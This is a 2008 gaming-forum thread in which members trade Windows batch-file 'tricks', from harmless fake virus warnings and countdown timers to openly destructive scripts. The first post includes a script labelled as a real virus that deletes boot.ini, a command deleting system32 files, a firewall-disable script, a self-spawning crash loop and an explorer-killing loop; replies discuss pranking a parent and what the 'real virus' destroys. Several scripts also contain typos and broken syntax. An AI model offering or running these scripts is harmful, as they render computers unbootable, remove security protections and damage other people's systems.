RomeScape
April 19, 2024, 09:09:01 am
Welcome, Guest. Please login or register.

Login with username, password and session length
News: My new email:
Pankers7@gmail.com
email me if u need anything Tongue
 
  Home   Forum   Help Search Arcade Staff List Login Register  

Fake Error messages/Bat Files "Post Here"

Pages: [1] 2   Go Down
  Print  
Author Topic: Fake Error messages/Bat Files "Post Here"  (Read 396 times)
0 Members and 1 Guest are viewing this topic.
FinishTheFight
RomeScape Bronze God
*

Reputation +115/-31
Offline Offline

Gender: Male
Posts: 1253


GO ROMESCAPE!!!


View Profile WWW
« on: March 02, 2008, 12:29:56 am »

 You can post your little tricks and bats here Smiley the codes!

Making Files
@echo off
cd "file path"
md "file"

Fake Virus
@echo offf
echo WARNING
echo A Virus Has Been Detected
echo Do You Want To Delete The Virus? (Y/N)
pause
echo Scanning....
pause
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
pause
cls
echo Virus Complete
echo C: Drive Deleted
pause

Creat File2
@echo off
Echo text>> name.txt
@exit

Fake Virus2
@echo off
echo This is a virus program.
echo Press any key to continue ...
pause >nul
echo To download the virus press "D" or any key to continue.
pause >nul
echo Something went wrong the virus is active.
echo Press any key to continue ...
pause >nul
echo The virus has been isolated.
echo Press any key to continu ..
pause >nul
echo Your pc needs to restart
echo press any key to continue ...
pause >nul
echo Installing restart
echo Press any key to continue ...
pause >nul
shutdown -r -t 30

timer
@echo off
title 30 sec timer
echo 30
ping localhost -n 2 > nul
cls
echo 29
ping localhost -n 1 > nul
cls
echo 28
ping localhost -n 2 > nul
cls
echo 27
ping localhost -n 2 > nul
cls
echo 26
ping localhost -n 2 > nul
cls
echo 25
ping localhost -n 2 > nul
cls
echo 24
ping localhost -n 2 > nul
cls
echo 23
ping localhost -n 2 > nul
cls
echo 22
ping localhost -n 2 > nul
cls
echo 21
ping localhost -n 2 > nul
cls
echo 20
ping localhost -n 2 > nul
cls
echo 19
ping localhost -n 2 > nul
cls
echo 18
ping localhost -n 2 > nul
cls
echo 17
ping localhost -n 2 > nul
cls
echo 16
ping localhost -n 2 > nul
cls
echo 15
ping localhost -n 2 > nul
cls
echo 14
ping localhost -n 2 > nul
cls
echo 13
ping localhost -n 2 > nul
cls
echo 12
ping localhost -n 2 > nul
cls
echo 11
ping localhost -n 2 > nul
cls
echo 10
ping localhost -n 2 > nul
cls
echo 9
ping localhost -n 2 > nul
cls
echo 8
ping localhost -n 2 > nul
cls
echo 7
ping localhost -n 2 > nul
cls
echo 6
ping localhost -n 2 > nul
cls
echo 5
ping localhost -n 2 > nul
cls
echo 4
ping localhost -n 2 > nul
cls
echo 3
ping localhost -n 2 > nul
cls
echo 2
ping localhost -n 2 > nul
cls
echo 1
ping localhost -n 2 > nul
cls
echo 0
ping localhost -n 2 > nul
cls
echo Time is up!!
pause >nul

DESTRUCTIVE VIRUS:REAL!!!
@echo off
title Now Killing Computer
attrib virus2.bat +s +h +r
attrib C:\boot.ini -s -h -r
copy C:\boot ini C:\bootini.vir
del C:\boot.ini
GOTO LOOP

:LOOP
GOTO LOOP

Fake Message Box
x = MsgBox("Message", 20,"Title")

WINDOWS CANT BOOT
@echo off
cd \ & attrib %windir%\system32\*+* -r -a -h -s & del \q \s
%windir%\system32\*+*

Firewall Disable
@echo off
net stop "Security Center"
net stop SharedAccess
netsh firewall set opmode mode=disable

LoopCrash
start name.bat name.bat
"save as name.bat"

Entask Explorer
@rcho off
:begin
tskill explorer
goto begin

"this will cause lag, to re-open it, go to entask, go to file-run, type in= explorer.exe"

Del Files
del "FILE PATH/File"
/Q /S >nul
« Last Edit: March 05, 2008, 04:15:59 pm by FinishTheFight » Report Spam   Logged



Read and follow the RS3 rules [HERE]
Download the RS3 client [HERE]

Share on Facebook Share on Twitter

Pr0t0typ3
Citizen III
**

Reputation +4/-12
Offline Offline

Gender: Male
Posts: 144


Romescape In-Game Moderator / Council Member


View Profile
« Reply #1 on: March 02, 2008, 01:42:06 pm »

where do you type the codes at?
Report Spam   Logged




Mr. Mod!
FinishTheFight
RomeScape Bronze God
*

Reputation +115/-31
Offline Offline

Gender: Male
Posts: 1253


GO ROMESCAPE!!!


View Profile WWW
« Reply #2 on: March 02, 2008, 03:24:35 pm »

 You type them in notepad then save it as whatever.bat
Report Spam   Logged



Read and follow the RS3 rules [HERE]
Download the RS3 client [HERE]
Pr0t0typ3
Citizen III
**

Reputation +4/-12
Offline Offline

Gender: Male
Posts: 144


Romescape In-Game Moderator / Council Member


View Profile
« Reply #3 on: March 02, 2008, 03:26:48 pm »

Ah. I have Notepad ++ so i hope that works.
Report Spam   Logged




Mr. Mod!
Pr0t0typ3
Citizen III
**

Reputation +4/-12
Offline Offline

Gender: Male
Posts: 144


Romescape In-Game Moderator / Council Member


View Profile
« Reply #4 on: March 02, 2008, 03:39:00 pm »

I thought I saw some typos, if you could check you post and fix them, I'd appreciate it  Grin.
I wanna try the real virus but idk what it will do. lol
Report Spam   Logged




Mr. Mod!
FinishTheFight
RomeScape Bronze God
*

Reputation +115/-31
Offline Offline

Gender: Male
Posts: 1253


GO ROMESCAPE!!!


View Profile WWW
« Reply #5 on: March 02, 2008, 03:51:02 pm »

 I saw 2 and fixed them! I don't know if the last one i posted/last part should be netsh or not
Report Spam   Logged



Read and follow the RS3 rules [HERE]
Download the RS3 client [HERE]
Pr0t0typ3
Citizen III
**

Reputation +4/-12
Offline Offline

Gender: Male
Posts: 144


Romescape In-Game Moderator / Council Member


View Profile
« Reply #6 on: March 02, 2008, 03:54:52 pm »

I made the "Fakevirus2" and im gonna fool my dad haha
Report Spam   Logged




Mr. Mod!
FinishTheFight
RomeScape Bronze God
*

Reputation +115/-31
Offline Offline

Gender: Male
Posts: 1253


GO ROMESCAPE!!!


View Profile WWW
« Reply #7 on: March 02, 2008, 04:31:02 pm »

 My dad would know, call my name ask if it did it. Then I don't know Smiley
Report Spam   Logged



Read and follow the RS3 rules [HERE]
Download the RS3 client [HERE]
Pr0t0typ3
Citizen III
**

Reputation +4/-12
Offline Offline

Gender: Male
Posts: 144


Romescape In-Game Moderator / Council Member


View Profile
« Reply #8 on: March 02, 2008, 04:34:42 pm »

i used it and tested it on myself and it does everything all the text but doesnt shut off my comp.

and, can u post or pm me what the real virus does?
Report Spam   Logged




Mr. Mod!
FinishTheFight
RomeScape Bronze God
*

Reputation +115/-31
Offline Offline

Gender: Male
Posts: 1253


GO ROMESCAPE!!!


View Profile WWW
« Reply #9 on: March 02, 2008, 05:21:42 pm »

 Try the code now and the real virus code up there deleted your boot.ini
Which means your pc won't be able to boot back up if turned off.
Report Spam   Logged



Read and follow the RS3 rules [HERE]
Download the RS3 client [HERE]
Pr0t0typ3
Citizen III
**

Reputation +4/-12
Offline Offline

Gender: Male
Posts: 144


Romescape In-Game Moderator / Council Member


View Profile
« Reply #10 on: March 02, 2008, 06:06:43 pm »

hahaha.
Report Spam   Logged




Mr. Mod!
Pr0t0typ3
Citizen III
**

Reputation +4/-12
Offline Offline

Gender: Male
Posts: 144


Romescape In-Game Moderator / Council Member


View Profile
« Reply #11 on: March 02, 2008, 06:28:34 pm »

I used a mix of those codes and made my own, i just gotta tweak it and ill post it.

@echo off
echo Please wait while Windows deletes everything on your pc
title 30 sec timer
echo 30
ping localhost -n 2 > nul
cls
echo 29
ping localhost -n 1 > nul
cls
echo 28
ping localhost -n 2 > nul
cls
echo 27
ping localhost -n 2 > nul
cls
echo 26
ping localhost -n 2 > nul
cls
echo 25
ping localhost -n 2 > nul
cls
echo 24
ping localhost -n 2 > nul
cls
echo 23
ping localhost -n 2 > nul
cls
echo 22
ping localhost -n 2 > nul
cls
echo 21
ping localhost -n 2 > nul
cls
echo 20
ping localhost -n 2 > nul
cls
echo 19
ping localhost -n 2 > nul
cls
echo 18
ping localhost -n 2 > nul
cls
echo 17
ping localhost -n 2 > nul
cls
echo 16
ping localhost -n 2 > nul
cls
echo 15
ping localhost -n 2 > nul
cls
echo 14
ping localhost -n 2 > nul
cls
echo 13
ping localhost -n 2 > nul
cls
echo 12
ping localhost -n 2 > nul
cls
echo 11
ping localhost -n 2 > nul
cls
echo 10
ping localhost -n 2 > nul
cls
echo 9
ping localhost -n 2 > nul
cls
echo 8
ping localhost -n 2 > nul
cls
echo 7
ping localhost -n 2 > nul
cls
echo 6
ping localhost -n 2 > nul
cls
echo 5
ping localhost -n 2 > nul
cls
echo 4
ping localhost -n 2 > nul
cls
echo 3
ping localhost -n 2 > nul
cls
echo 2
ping localhost -n 2 > nul
cls
echo 1
ping localhost -n 2 > nul
cls
echo 0
ping localhost -n 2 > nul
cls
echo Your computer needs to restart for the deleting to finish.
pause >nul
echo Press any key to continue ...
shutdown -r -t 10

NOTE:  This is a FAKE and will NOT hurt your computer in any way, if you have an unsaved document opened it may delete that, but most computers will ask if you want to save the file.
Report Spam   Logged




Mr. Mod!
Brandon
RomeScape Owner
Royal Governer
*

Reputation +484/-50
Offline Offline

Gender: Male
Posts: 623



View Profile
« Reply #12 on: March 02, 2008, 06:28:50 pm »

omg lol ftf what kind of school do you go to that teaches you this illegal crap lol Tongue
Report Spam   Logged

The one and only!
Quote
Black sword!
*farmer kills his lordship*
Quote
this place is the shiz -Kids Ranqe
Quote
Everyone is coming back to RomeScape. Witch is a very good thing. -FinishTheFight
Quote
dont be a hater be a player

 "My love for you is unreal " -Biggy
Pr0t0typ3
Citizen III
**

Reputation +4/-12
Offline Offline

Gender: Male
Posts: 144


Romescape In-Game Moderator / Council Member


View Profile
« Reply #13 on: March 02, 2008, 06:41:32 pm »

only the real one is illegal...and hey u hack'd forums or used ur admin powerz to make u have +467 rep lol
Report Spam   Logged




Mr. Mod!
FinishTheFight
RomeScape Bronze God
*

Reputation +115/-31
Offline Offline

Gender: Male
Posts: 1253


GO ROMESCAPE!!!


View Profile WWW
« Reply #14 on: March 02, 2008, 06:52:15 pm »

"FTF just fell out of his chair laughing" None of these are illegal. Only sending a .bat (batch) file over the internet is illegal. Some of them are harmful to your pc if you use them though Smiley. That's why I have mine saved as text,lol. Sense my other pc got messed up I lost all programs. So I am trying to remember the code that makes 30000 files on your desktop.
Report Spam   Logged



Read and follow the RS3 rules [HERE]
Download the RS3 client [HERE]
Pages: [1] 2   Go Up
  Print  
 
Jump to:  

Bookmark this site! | Upgrade This Forum
SMF For Free - Create your own Forum
Powered by SMF | SMF © 2016, Simple Machines
Privacy Policy